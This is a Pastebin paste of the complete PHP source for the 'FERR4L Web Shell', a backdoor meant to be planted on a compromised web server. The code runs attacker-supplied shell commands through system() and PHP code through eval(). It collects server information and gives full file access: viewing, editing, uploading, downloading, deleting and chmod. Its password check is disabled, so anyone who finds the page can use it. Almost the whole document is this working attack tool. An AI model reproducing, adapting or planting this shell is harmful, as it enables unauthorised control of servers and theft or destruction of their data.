API tools faq
paste
FeRR4L

shell dasar

FeRR4L
Jan 3rd, 2014
133
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 16.56 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. /*****[AUTH CONFIG]*****/
  4. $xpass = 'dc76e9f0c0006e8f919e0c515c66dbba3982f785'; //password for access in sha1 ("root" as default)
  5.  
  6. /*****[COLOR CONFIG]*****/
  7. $text = '#FF0000'; //text color
  8. $background = '#1A1A1A'; //background color
  9.  
  10. /*****[PHP CONFIG]*****/
  11. @set_time_limit(0);
  12. @ini_set('max_execution_time',0);
  13. @ignore_user_abort(1);
  14.  
  15. /*****[CODE START]*****/
  16. $self = $_SERVER['PHP_SELF'];
  17. $act = $_GET['action'];
  18. $user = $_ENV['USERNAME'];
  19.  
  20. /*****[AUTH CODE]*****/
  21. $pass = $_POST['xpass'];
  22. $login = "
  23.    <title>FERR4L Web Shell</title>
  24.    <center>Enter Password:<br>
  25.    <form method='POST' action=".$self.">
  26.   <input type='password' name='xpass'><br><input type='submit'></form>";
  27. if(isset($pass))
  28. {
  29.     setcookie("FERR4L", $pass, time()+86400);
  30.     print ("<META http-equiv='refresh' content='0'>");
  31. }
  32. if (1 != 1)
  33. {
  34.     print ($login);
  35. }
  36. else
  37. {
  38. if (isset($_POST['FERR4L_DIR']))
  39.    {
  40.        $x = $_POST['FERR4L_DIR'];
  41.        setcookie("FERR4L_DIR", $x, time()+86400);
  42.       print ("<META http-equiv='refresh' content='0'>");
  43.    }
  44. elseif ($act !== "load")
  45. {
  46.  
  47. /*****[MAIN]*****/
  48. if (ini_get("safe_mode") or strtolower(ini_get("safe_mode")) == "on"){$smode = "ON";}else{$smode = "OFF";}
  49. print ("
  50. <title>FERR4L Web Shell</title>
  51. <META http-equiv='expires' content='0'>
  52. <head><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head>
  53. <body text='".$text."' bgcolor='".$background."' link='".$text."' vlink='".$text."' alink='".$text."'>
  54. <center><b><font size='5'>FERR4L WEB SHELL</b>
  55. </font></b></div>
  56. <div align='center'>
  57. <table border='1' width='70%' bordercolorlight='".$text."' cellspacing='0' id='table1'>
  58. <tr><td colspan='2'><font style='font-size: 11.5pt'>
  59. &nbsp;System: ".php_uname()."<br>
  60. &nbsp;Server: ".$_SERVER['SERVER_SOFTWARE']."<br>
  61. &nbsp;Safe mode: ".$smode."<br>
  62. &nbsp;Host info: ".$_SERVER['HTTP_HOST'].' - '.$_SERVER['SERVER_ADDR']."
  63. </font></tr><tr><td>
  64. &nbsp;&nbsp;<a href='".$self."'>Shell</a>
  65. &nbsp;&nbsp;<a href='".$self."?action=serverinfo'>ServInfo</a>
  66. &nbsp;&nbsp;<a href='".$self."?action=files'>Files</a>
  67. &nbsp;&nbsp;<a href='".$self."?action=eval'>PHP</a>
  68. &nbsp;&nbsp;<a href='".$self."?action=xpack'>X-toolz</a>
  69. </td></tr><tr><td>");
  70.  
  71. /*****[SERVER INFO]*****/
  72. if ($act == "serverinfo")
  73. {
  74.     if(function_exists('curl_version')>0){$curl = "ON";}else{$curl = "OFF";}
  75.     (($disabled=ini_get('disable_functions'))==')?$disabled='NO':str_replace(array(',',';'), ', ', $disabled);
  76.    if(get_magic_quotes_gpc()>0){$mq="ON";}else{$mq="OFF";}
  77.    if(function_exists('apache_get_modules')>0){$apache=implode(', ',apache_get_modules());}
  78.    if(function_exists('get_loaded_extensions')>0){$phprun=implode(', ',get_loaded_extensions());}
  79.    if(function_exists('gzencode')>0){$gzip="ON";}else{$gzip="OFF";}
  80.    if(function_exists('mysql_connect')>0){$mysql="ON";}else{$mysql="OFF";}
  81.    if(function_exists('mssql_connect')>0){$mssql="ON";}else{$mssql="OFF";}
  82.    if(function_exists('pg_connect')>0){$PostgreSQL="ON";}else{$PostgreSQL="OFF";}
  83.    if(function_exists('ocilogon')>0){$Oracle="ON";}else{$Oracle="OFF";}
  84.    print("
  85.    <table><td>
  86.   <b>User:</b> " . $user ."<br>
  87.   <b>cURL:</b> " . $curl. "<br>
  88.   <b>gZip:</b> " . $gzip. "<br>
  89.   <b>MySQL:</b> " . $mysql. "<br>
  90.   <b>MsSQL:</b> " . $mssql. "<br>
  91.   <b>PostgreSQL:</b> " . $PostgreSQL. "<br>
  92.   <b>Oracle:</b> " . $Oracle. "<br>
  93.   <b>Magic Quotes:</b> ". $mq ."<br>
  94.   <b>Disabled PHP functions:</b> " . $disabled ."<br>
  95.   <b>PHP Modules:</b> " . $phprun ."<br>
  96.   <b>Apache Modules:</b> " . $apache ."<br>");
  97. }
  98.  
  99. /*****[PHP Eval]*****/
  100. elseif($act == "eval")
  101. {
  102.    $eval=$_POST['eval'];
  103.    print("
  104.    <table><form action='".$self."?action=eval' method='POST'><tr><td>
  105.    <textarea name='eval' style='color: ".$text."; background-color: ".$background."' cols='82' rows='10'></textarea>
  106.    <input type='submit' value='eXecute' style='color: ".$text."; background-color: ".$background."'></td></tr>
  107.   <td style='border-style: solid; border-width: 1px'>");
  108.    if(isset($eval))
  109.    {
  110.        $eval=str_replace('\"', "'", $eval);
  111.        eval($eval);
  112.    }
  113. }
  114.  
  115. /*****[ENCODER]*****/
  116. elseif($act == "encoder")
  117. {
  118.    $code=$_POST['code'];
  119.    print("
  120.    <table>
  121.    <form method='POST'>
  122.    <tr><td><input size='80' style='color: ".$text."; background-color: ".$background."' name='code'>
  123.    <input type='submit' value='enc0de' style='color: ".$text."; background-color: ".$background."'>
  124.    </td></tr>");
  125.    if(isset($code))
  126.    {
  127.        print ("
  128.        <tr><td>
  129.        Text: ". $code ."<br>
  130.        Base 64 encoded: &nbsp;&nbsp;&nbsp;".base64_encode($code)."<br>
  131.        Base 64 decoded: &nbsp;&nbsp;&nbsp;".base64_decode($code)."<br>
  132.        Hex encoded text: &nbsp;&nbsp;&nbsp;".bin2hex($code)."<br>
  133.        Hex decoded text: &nbsp;&nbsp;&nbsp;".@htmlspecialchars(pack("H*",$code))."<br>
  134.        MD5 encoded text: &nbsp;".md5($code)."<br>
  135.        MD5 decoded text: &nbsp;<a href='http://gdataonline.com/qkhash.php?mode=txt&hash=".$code."'>view</a><br>
  136.         SHA1 encoded text: ".sha1($code)."<br></td>");
  137.    }
  138. }
  139.  
  140. /*****[X-PACK]*****/
  141. elseif($act == "xpack")
  142. {
  143.    print("<center>
  144.     &nbsp;&nbsp;<a href='".$self."?action=encoder'>Encoder</a><br>
  145.    ");
  146. }
  147.  
  148. /*****[FILES]*****/
  149. elseif($act == "files")
  150. {
  151.    if (isset($_COOKIE['FERR4L_DIR']))
  152.   {
  153.       $x = $_COOKIE['FERR4L_DIR'];
  154.   }
  155.   else
  156.   {
  157.        $x = dirname($_SERVER['SCRIPT_FILENAME']);
  158.    }
  159.    $xdir=@chdir($x);
  160.    if($_GET["view"] !== NULL)
  161.    {
  162.       $view=$_GET["view"];
  163.        ob_clean();
  164.        $z = file_get_contents($view);
  165.        print("
  166.         <table>
  167.         <tr><td>
  168.         <a href='javascript:history.back();'>Go back</a>
  169.        <form method='POST'>
  170.         <textarea name='content' style='color: ".$text."; background-color: ".$background."' cols='82' rows='20'>");
  171.        print (str_replace('</textarea>', '<//textarea>', $z));
  172.        print ("</textarea><br><input type='submit' value='Save' style='color: ".$text."; background-color: ".$background."'></form>");
  173.       if(isset($_POST['content']))
  174.       {
  175.           $content = $_POST['content'];
  176.          $content = str_replace("<//textarea>", "</textarea>", $content);
  177.           $content = str_replace('\"', '"', $content);
  178.           $content = str_replace("\'", "'", $content);
  179.           $f = fopen($view, 'w');
  180.           fputs ($f, $content);
  181.           fclose ($f);
  182.           print ("<META http-equiv='refresh' content='0'>");
  183.        }
  184.     }
  185.     elseif($_GET["up"] !== NULL)
  186.     {
  187.         print("<center><b>Upload!<br></b><form enctype='multipart/form-data' action='".$self."?action=files' method='POST'>
  188.       <input type='file' style='color: ".$text."; background-color: ".$background."' size='40' name='upl' style='color: ".$text."; background-color: ".$background."'><br>
  189.       TO: <input type='text' name='dir' size='40' style='color: ".$text."; background-color: ".$background."' value=".$x.">
  190.       <input type='submit' style='color: ".$text."; background-color: ".$background."' value='GO!'></form>");
  191.     }
  192.     elseif($_GET["md"] !== NULL)
  193.     {
  194.         print("<form method='POST' action='".$self."?action=files'>
  195.       <center><b>Make dir!</b><br><input type='text' style='color: ".$text."; background-color: ".$background."' name='makedir'>
  196.       <input type='submit' value='make' style='color: ".$text."; background-color: ".$background."'></form>");
  197.     }
  198.     elseif($_GET["deletef"] !== NULL)
  199.     {
  200.         if(@unlink($_GET["deletef"]))
  201.        {
  202.            print ("<center>File \"".$_GET['deletef']."\" successful deleted!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  203.        }
  204.        else
  205.        {
  206.       print ("<center>File \"".$_GET['deletef']."\" can`t be deleted!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  207.        }
  208.     }
  209.     elseif($_GET["deleted"] !== NULL)
  210.     {
  211.         if(@rmdir($_GET["deleted"]))
  212.        {
  213.            print ("<center>Dir \"".$_GET['deleted']."\" successful deleted!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  214.        }
  215.        else
  216.        {
  217.            print ("<center>Dir \"".$_GET['deleted']."\" can`t be deleted!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  218.        }
  219.     }
  220.     elseif($_GET["rename"] !== NULL)
  221.     {
  222.        if(isset($_POST['rename']))
  223.       {
  224.           @rename($_GET['rename'], $_POST['rename']) or die ("<center>".$_GET['rename']."\" can`t be renamed to".$_POST['rename']."!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  225.          print ("<center>".$_GET['rename']."\" successful renamed to".$_POST['rename']."!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  226.       }
  227.       else
  228.       {
  229.             print ("<center>Rename ".$_GET['rename']."<br><form method='POST'>to:
  230.          <input size='45' value='".dirname($_GET['rename'])."/' name='rename' style='color: ".$text."; background-color: ".$background."'>
  231.          <input type='submit' value='Rename' style='color: ".$text."; background-color: ".$background."'>");
  232.       }
  233.    }
  234.     elseif($_GET["chmod"] !== NULL)
  235.     {
  236.        if(isset($_POST['chmod']))
  237.       {
  238.           @chmod($_GET['chmod'], $_POST['chmod']) or die ("<center>Chmod for ".$_GET['chmod']." can`t be changed to ".$_POST['chmod']."!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  239.          print ("<center>Chmod for ".$_GET['chmod']." successful changed to ".$_POST['chmod']."!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  240.       }
  241.       else
  242.       {
  243.             print ("<center>Chmod ".$_GET['cmod']."<br><form method='POST'>
  244.          <input size='45' value='0777' name='chmod' style='color: ".$text."; background-color: ".$background."'>
  245.          <input type='submit' value='Chmod' style='color: ".$text."; background-color: ".$background."'>");
  246.       }
  247.    }
  248.     elseif($_POST["makedir"] !== NULL)
  249.     {
  250.         if(@mkdir($_POST["makedir"]))
  251.        {
  252.            print ("<center>Dir \"".$_POST["makedir"]."\" successful created!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  253.        }
  254.        else
  255.        {
  256.           print ("<center>Dir \"".$_POST["makedir"]."\" can`t be created!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  257.        }
  258.     }
  259.     elseif (isset($HTTP_POST_FILES["upl"]))
  260.     {
  261.         if(@copy($HTTP_POST_FILES["upl"]["tmp_name"],
  262.        $_POST['dir']."/".$HTTP_POST_FILES["upl"]["name"]))
  263.         {
  264.             print("<center>File \"".$HTTP_POST_FILES["upl"]["name"]."\" successful uploaded<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  265.         }
  266.        else
  267.        {
  268.            print("<center>File \"".$HTTP_POST_FILES["upl"]["name"]."\" can`t be uploaded<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  269.        }
  270.     }
  271.     else
  272.     {
  273.        function chmodr($name)
  274.         {
  275.             if (fileperms($name) & 00400){print "r";}else{print "-";}
  276.            if (fileperms($name) & 00200){print "w";}else{print "-";}
  277.             if (fileperms($name) & 00100){print "x";}else{print "-";}
  278.            print ("/");
  279.            if (fileperms($name) & 00040){print "r";}else{print "-";}
  280.            if (fileperms($name) & 00020){print "w";}else{print "-";}
  281.            if (fileperms($name) & 00010){print "x";}else{print "-";}
  282.            print ("/");
  283.            if (fileperms($name) & 00004){print "r";}else{print "-";}
  284.            if (fileperms($name) & 00002){print "w";}else{print "-";}
  285.            if (fileperms($name) & 00001){print "x";}else{print "-";}
  286.         }
  287.       if (PHP_OS != "WINNT"){$nowin = 1;}
  288.       if (!($dir = @opendir($x)))
  289.       {
  290.            die ("<center>Access denied on <b>".$x."<b><br><table><td><form method='POST'>
  291.            <input type='hidden' name='FERR4L_DIR' value=".dirname($_SERVER['SCRIPT_FILENAME']).">
  292.            <input type='submit' value='Go home' style='color: ".$text."; background-color: ".$background."'>
  293.           </form>");
  294.        }
  295.        print ("<table width='695'><td colspan='6'><table><td><form method='POST'>
  296.        <input size='63' style='color: ".$text."; background-color: ".$background."' name='FERR4L_DIR' value=".$x.">
  297.        <input type='submit' value='Go!' style='color: ".$text."; background-color: ".$background."'>
  298.       </form>
  299.      </table></center>&nbsp;<tr>
  300.      <td width='40'>Type/Name<td width='16'>Size(Byte)<td width='80'>Perms<td width='20'>Owner<td width='20'>Group<td width='20'>&nbsp;<tr>");
  301.         print ("<td width='40'>dir&nbsp;&nbsp;<b>.</b><td width='25'>---<td width='80'>");
  302.       chmodr($x."/.");
  303.       print ("<td width='20'>"); if(isset($nowin)){$k=posix_getpwuid(fileowner($x."/.")); print($k[name]);}else{print("---");} print("<td width='20'>"); if(isset($nowin)){$k=posix_getgrgid(filegroup($x."/.")); print($k[name]);}else{print("---");} print("<td width='200'>");
  304.        print ("<a href='".$self."?action=files&deleted=".$x."/.'>Delete</a>&nbsp;|&nbsp;<a href='".$self."?action=files&rename=".$x."/.'>Rename</a>&nbsp;|&nbsp;<a href='".$self."?action=files&chmod=".$x."/.'>Chmod</a><tr>");
  305.         print ("<td width='40'>dir&nbsp;&nbsp;<b>..</b><td width='25'>---<td width='80'>");
  306.       chmodr($x."/..");
  307.       print ("<td width='20'>"); if(isset($nowin)){$k=posix_getpwuid(fileowner($x."/..")); print($k[name]);}else{print("---");} print("<td width='20'>"); if(isset($nowin)){$k=posix_getgrgid(filegroup($x."/..")); print($k[name]);}else{print("---");} print("<td width='200'>");
  308.        print ("<a href='".$self."?action=files&deleted=".$x."/.'>Delete</a>&nbsp;|&nbsp;<a href='".$self."?action=files&rename=".$x."/..'>Rename</a>&nbsp;|&nbsp;<a href='".$self."?action=files&chmod=".$x."/..'>Chmod</a><tr>");
  309.         while($name = readdir($dir))
  310.         {
  311.           if (is_dir($name))
  312.           {
  313.              if ($name !== "." and $name !== "..")
  314.             {
  315.                    print ("<td width='40'>dir&nbsp;&nbsp;<b>".$name."</b><td width='25'>---<td width='80'>");
  316.                     chmodr($name);
  317.                  print ("<td width='20'>"); if(isset($nowin)){$k=posix_getpwuid(fileowner($name)); print($k[name]);}else{print("---");} print("<td width='20'>"); if(isset($nowin)){$k=posix_getgrgid(filegroup($name)); print($k[name]);}else{print("---");} print("<td width='200'>");
  318.                   print ("<a href='".$self."?action=files&deleted=".$x."/".$name."'>Delete</a>&nbsp;|&nbsp;<a href='".$self."?action=files&rename=".$x."/".$name."'>Rename</a>&nbsp;|&nbsp;<a href='".$self."?action=files&chmod=".$x."/".$name."'>Chmod</a><tr>");
  319.             }
  320.          }
  321.       }
  322.       $dir = @opendir($x);
  323.       while($name = readdir($dir))
  324.         {
  325.          if (!is_dir($name))
  326.          {
  327.                 print ("<td width='40'>".filetype($name)."&nbsp;&nbsp;".$name."<td width='25'>".filesize($name)."<td width='80'>");
  328.                 chmodr($name);
  329.              print ("<td width='20'>"); if(isset($nowin)){$k=posix_getpwuid(fileowner($name)); print($k[name]);}else{print("---");} print("<td width='20'>"); if(isset($nowin)){$k=posix_getgrgid(filegroup($name)); print($k[name]);}else{print("---");} print("<td width='200'>");
  330.               print ("<a href='".$self."?action=load&load=".$x."/".$name."'>Load</a>&nbsp;|&nbsp;<a href='".$self."?action=files&view=".$x."/".$name."'>Edit</a>&nbsp;|&nbsp;<a href='".$self."?action=files&deletef=".$x."/".$name."'>Delete</a>&nbsp;|&nbsp;<a href='".$self."?action=files&rename=".$x."/".$name."'>Rename</a>&nbsp;|&nbsp;<a href='".$self."?action=files&chmod=".$x."/".$name."'>Chmod</a><tr>");
  331.          }
  332.        }
  333.        print ("
  334.       </td><tr></td></td><tr></td><tr><td colspan='6' rowspan='2'><center><b><a href='".$self."?action=files&md'>Make Directory</a><br><a href='".$self."?action=files&up'>Uploader</a></b></td>
  335.       ");
  336.     }
  337. }
  338. /*****[SHELL]*****/
  339. else
  340. {
  341.     print("
  342.    <table>
  343.    <form action='".$self."' method='POST'>
  344.    <tr><td>
  345.    <input size='80' style='color: ".$text."; background-color: ".$background."' name='cmd'><input type='submit' value='eXecute' style='color: ".$text."; background-color: ".$background."'>
  346.    </td></tr><tr><td>
  347.    <textarea style='color: ".$text."; background-color: ".$background."' cols='82' rows='20'>");
  348.     if (isset($_POST['cmd']))
  349.     {
  350.     system($_POST['cmd']);
  351.     }
  352.     print ("</textarea>");
  353. }
  354. }
  355.  
  356. /*****[FILE DOWNLOAD]*****/
  357. else
  358. {
  359.     $load=$_GET["load"];
  360.     ob_clean();
  361.     header("Content-type: application/octet-stream/".filetype($load));
  362.     header("Content-length: ".filesize($load));
  363.     header("Content-disposition: attachment; filename=".$load);
  364.     $z = file_get_contents($load);
  365.     print $z;
  366.     exit;
  367. }
  368. }
  369.  
  370. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!